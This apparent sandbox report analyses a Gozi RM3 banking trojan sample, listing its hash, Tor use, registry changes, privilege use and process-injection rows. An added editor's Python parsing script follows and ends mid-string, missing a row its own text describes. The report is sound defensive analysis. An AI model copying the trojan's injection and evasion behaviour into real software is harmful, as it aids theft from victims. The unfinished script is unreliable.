Malware Analysis Report

2024-10-19 03:01

Sample ID: 220315-mfdacacaak
Target: XqBTvE.ntwgj
SHA256: ea10f282be1864ccfe204fcba69fea1b172213a5dc114ef46c629a1ea98c8c24
Tags: gozi_rm3, banker, trojan
Score: 10/10

Table of Contents

  Analysis Overview
  MITRE ATT&CK
    Enterprise Matrix V6
  Analysis: static1
    Detonation Overview
    Signatures
  Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
  Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: ea10f282be1864ccfe204fcba69fea1b172213a5dc114ef46c629a1ea98c8c24

Threat Level: Known bad

The file XqBTvE.ntwgj was found to be: Known bad.

Malicious Activity Summary

gozi_rm3 banker trojan

Gozi RM3

Uses Tor communications

Drops file in System32 directory

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-03-15 10:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-03-15 10:24
Reported: 2022-03-15 10:27
Platform: win7-20220311-en
Max time kernel: 4294235s
Max time network: 196s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Uses Tor communications

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc000000000200000000001066000000010000200000008c6ac78a9c02bb691000dbaa9a2c79699caee8caacbb38417a13c9cdd9d5bcc9000000000e80000000020000200000000f199234ac4e59d3eea4bd150d24ec2f58f942bbab054eb9d03e85a526a9340430010000392475654227696321847e632dd6a811dbcd66e55686fd7912cd16b38f8bb78b3295c877a80f6334fb6e9bcecc5484fc08e40f8c358d52593dab15da5513253df1b4acda2d1ebe52a1de1fed0bcf622a28775501d16d20cbffa29238d3a0015642226b2c7b2313f04dfc5b6a53d0356ed28360b97935bd2dcc1fdf453c24ade16a1bd666e985eb2f816a82e7667b150babd42c83a0a5fafee2e621ac8b329db8c129ac726a4cf7743d45d65f41f19c3123e3ae1e47cf406e9915d553550f6d70fe28b448fa59e3f18002167acbbb1fa0fad091481fcff3e5c20cdd547b2783e303550b768855704b14ade597b4f2216af86ce3f5f2af20881b755381751aff58d8354bf7f2c9c2b8f2402afb235056a317abd8a10748023c0a7a1402c50be7a12e0c92ad407c80d4e8a093203412c36e4000000066db87c37fd8ce488332aab5f5f1b83ec66d731a65df6b7debba94d6b1812aec181b64ade807135c6833bae2ba3c0a8b10c5f7fd3226d1904c9f4625fdf5a5f0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{369EC241-A44A-11EC-AAE0-5ECE7ED1C3DF} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value elided] C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000064fad1ab0796e565f081287559c9c65b5fcd8da9d61391a80380e0209d6f4836000000000e80000000020000200000004f1eba19b0a59d5388e75f68547ee74022e01269ffa8657b6367399a01cc6976300100008bb5e0885f203a98eea34c0d4b6550b109ac7f6a599fe314c1c6cb0ed2994b07e1a888b5d0af9ac5aeb7157f46d023ad783e1f6b1210493c7ba6b44d8f8dd964f82c2b8b429343d391c83ddc8ca2d6cbd3fca09e0f2472d42e3b58e33b544c909b847a4a310f823e821d5b583c6c25df501397197b2607223dde602405dc33996d00efb8b9a3bddead7d76e71f3de25648fd36f424d88ba3d14a970c4c567976198c76bba6dd365d48c1229634b26a7a9fe86b406c0b5a6494300697cd79f14605e8cc1c27ad6c9098e19fe0f3b2217e9a94167767fc5e59c556d9df00be5f296baaa97a0918e4fe75dcf1471a273cd580a380ae128dadd4260c0da67bbc872d6b3a085754dc2258e415ffd9736b7d1ad5d788e4bc9d5737e0aa53752387e50d3073c9f127a84d6c15068a400b6da04d4000000036973f4463fca7ab35a7ab55c34eb2628629e62313b603cdfb58454ea42b0aa07a68ac99adb2609034e4d9d96fb452c6545684d80de135bc528fda57bf9b5c6d C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc0000000002000000000010660000000100002000000064c314093f9263ad8e777ae4325fea6599d16ae8ba83cf39eabba7049e7c67ce000000000e8000000002000020000000ecb1a323eb8ddcaf3031605979b3362ac193545437f0cfa470edf1e00fa333953001000097bec2ec93754940ce9997a6ef3e65d2484b5ca7c9383b7d949a2d62f85eb729e50d1d1466478c21c5a03b7efcf5e60f65882b1729f0277b92d9dd2e14dc575fc335da3acb9d14dcc5296b47d5489a1891098300b4eed32f46e693dc6ad2f210deea42a330d1ec5bf9a5bded3d2464072e2875cbd808644525642966220b4d24a6c328254039465283af5e043cbda5a5088702a43c9f8321dcd1f7af9d26994498735b16d18084910829b93e17ca50271b0989f64f6f69c453abb399c2aafb895c620deefc9a05e098d76a42d4ed1ff590b40ffcffc74e4ff0c6337fe3b72f66ac11662e2400fe54f1db5959a2425f82e644b2af0eff6b7863a9e577c91fa963c9a5ca17e95b5b1fcfbf01e564291468b3646f94a8c9748354c556d7edc7165c722e51274fedd99cf3d1e0655dbd613f4000000067660b432a634968406d1c0e8f27cbbaf7c40c519a2d1bf336d042b64617a8e358f6aa7d1dbb855822cad957051aaed146eff04346fed059e7ab8fdbd0c0b10d C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 0031e9085738d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d8f8b5d2fcdd154fb512d53e64640bcc00000000020000000000106600000001000020000000c6492dde4c3684eec29a23bbf9c91afffff7f94293a5542ec802b6995f89841e000000000e80000000020000200000007a108a2c25f650825ebb1ec94a61217a571042223a7188c3356fd88e360a1fb120000000a4f4c0180e861c49d74e076f38c51d83b6b28607aaa49b3a70d027d6fb0c62b240000000a00fff0d83ffcc52f124ca7a2e4fd41f396a9d934eacd8c7624426d8339871aae131ab01268a25fdeb1041413f03da01ae1584bf4d64c582098cb8f3c4468a40 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1316 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1316 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1316 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 628 wrote to memory of 1744 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 628 wrote to memory of 1744 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 628 wrote to memory of 1744 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 1424 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 1424 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 1424 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 912 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 912 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 912 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 824 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1768 wrote to memory of 824 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1768 wrote to memory of 824 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 824 wrote to memory of 964 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 824 wrote to memory of 964 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 824 wrote to memory of 964 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1768 wrote to memory of 1712 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1768 wrote to memory of 1712 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1768 wrote to memory of 1712 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1712 wrote to memory of 1936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1712 wrote to memory of 1936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1712 wrote to memory of 1936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1768 wrote to memory of 1252 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2024 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe C:\Windows\Explorer.EXE
PID 1468 wrote to memory of 240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1468 wrote to memory of 240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1468 wrote to memory of 240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
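The table above is flat, and the rows that matter are easy to miss among the launcher noise (process creation itself involves the parent writing into the new child, which is why every cmd.exe and csc.exe launcher shows up here). The script below is an added example, not part of the sandbox report: it parses the rows into a graph, walks the subtree spawned from cmd.exe PID 1316, and lists the targets written to by more than one process. The only such target is Explorer.EXE (PID 1252), written by both powershell.exe 1768 and the dropped XqBTvE.exe 2024; Explorer is the shell that launched the sample (it heads the process list below), not a child of either writer, so those two rows are the injection. ROWS holds one copy of each distinct writer/target pair from the table; the report repeats most of them three or four times. Helper names are my own.

```python
"""Rebuild the WriteProcessMemory relationships from the flattened report rows.
Added example: editor's code, not part of the sandbox report or the sample."""
import ntpath
import re
from collections import defaultdict

# One row per distinct writer/target pair, copied from the report table.
ROWS = r"""
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1316 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 628 wrote to memory of 1744 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 1424 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 912 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 824 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 824 wrote to memory of 964 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1768 wrote to memory of 1712 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1712 wrote to memory of 1936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1768 wrote to memory of 1252 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
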